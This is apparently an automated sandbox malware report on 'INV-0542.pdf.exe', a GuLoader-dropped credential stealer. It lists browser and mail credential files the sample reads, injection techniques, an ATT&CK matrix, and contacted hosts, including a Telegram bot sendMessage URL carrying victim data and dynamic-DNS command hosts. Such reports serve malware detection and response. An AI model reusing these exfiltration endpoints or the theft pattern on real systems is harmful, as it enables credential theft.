          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\INV-0542.pdf.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3652, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3652, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3652, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          12
          Obfuscated Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          PowerShell
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Software Packing
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection
          1
          DLL Side-Loading
          Security Account Manager111
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
          Virtualization/Sandbox Evasion
          LSA Secrets131
          Virtualization/Sandbox Evasion
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562595 Sample: INV-0542.pdf.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 4 other IPs or domains 2->26 34 Found malware configuration 2->34 36 Yara detected GuLoader 2->36 38 Yara detected Telegram RAT 2->38 44 6 other signatures 2->44 8 INV-0542.pdf.exe 5 24 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 process5 10 powershell.exe 30 8->10         started        file6 20 C:\Users\user\AppData\...\INV-0542.pdf.exe, PE32 10->20 dropped 46 Early bird code injection technique detected 10->46 48 Writes to foreign memory regions 10->48 50 Found suspicious powershell code related to unpacking or dynamic code loading 10->50 52 3 other signatures 10->52 14 msiexec.exe 15 8 10->14         started        18 conhost.exe 10->18         started        signatures7 process8 dnsIp9 28 checkip.dyndns.com 132.226.8.169, 49780, 49802, 49812 UTMEMUS United States 14->28 30 api.telegram.org 149.154.167.220, 443, 49870 TELEGRAMRU United Kingdom 14->30 32 3 other IPs or domains 14->32 54 Tries to steal Mail credentials (via file / registry access) 14->54 56 Tries to harvest and steal browser information (history, passwords, etc) 14->56 58 Hides threads from debuggers 14->58 signatures10

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          INV-0542.pdf.exe11%ReversingLabs
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe11%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://crl.micro=0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          172.217.19.174
          truefalse
            high
            drive.usercontent.google.com
            142.250.181.1
            truefalse
              high
              reallyfreegeoip.org
              172.67.177.134
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  132.226.8.169
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        high
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.75false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgmsiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botmsiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20amsiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000005.00000002.3302092440.0000000021A50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A41000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://varders.kozow.com:8081msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.commsiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.com/lBWmsiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.org/xml/8.46.123.75$msiexec.exe, 00000005.00000002.3302092440.0000000021909000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/powershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/pscore6lBjqpowershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.micro=powershell.exe, 00000002.00000002.2412724868.00000000029B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://apis.google.commsiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2413511774.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://chrome.google.com/webstore?hl=enlBjqmsiexec.exe, 00000005.00000002.3302092440.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.office.com/msiexec.exe, 00000005.00000002.3302092440.0000000021A81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000005.00000003.2480542590.000000000077E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2480591821.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive.google.com/$Emsiexec.exe, 00000005.00000002.3286405273.000000000070A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.2416042628.0000000005839000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive.usercontent.google.com/msiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://checkip.dyndns.orgmsiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.office.com/lBjqmsiexec.exe, 00000005.00000002.3302092440.0000000021A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://nsis.sf.net/NSIS_ErrorErrorINV-0542.pdf.exe, INV-0542.pdf.exe.2.drfalse
                                                                                                  high
                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://drive.usercontent.google.com/Umsiexec.exe, 00000005.00000002.3286405273.0000000000779000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2540711816.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://aborters.duckdns.org:8081msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anotherarmy.dns.army:8081msiexec.exe, 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2413511774.0000000004927000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.3302092440.000000002194E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.00000000218DE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3302092440.0000000021974000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000005.00000002.3303268836.00000000228B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      132.226.8.169
                                                                                                                      checkip.dyndns.comUnited States
                                                                                                                      16989UTMEMUSfalse
                                                                                                                      149.154.167.220
                                                                                                                      api.telegram.orgUnited Kingdom
                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                      142.250.181.1
                                                                                                                      drive.usercontent.google.comUnited States
                                                                                                                      15169GOOGLEUSfalse
                                                                                                                      172.217.19.174
                                                                                                                      drive.google.comUnited States
                                                                                                                      15169GOOGLEUSfalse
                                                                                                                      172.67.177.134
                                                                                                                      reallyfreegeoip.orgUnited States
                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1562595
                                                                                                                      Start date and time:2024-11-25 18:42:04 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 6m 51s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:7
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:INV-0542.pdf.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@6/16@5/5
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 88%
                                                                                                                      • Number of executed functions: 123
                                                                                                                      • Number of non-executed functions: 99
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 3652 because it is empty
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5776 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: INV-0542.pdf.exe
                                                                                                                      TimeTypeDescription
                                                                                                                      12:42:58API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                                      12:43:52API Interceptor210529x Sleep call for process: msiexec.exe modified
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      132.226.8.169dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • checkip.dyndns.org/
                                                                                                                      149.154.167.220DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                        2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                                                          Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                                                            tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                                                              Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                                                                                MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                  November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          172.67.177.134jbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                              LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                  F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                          NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                            MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              api.telegram.orgDJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
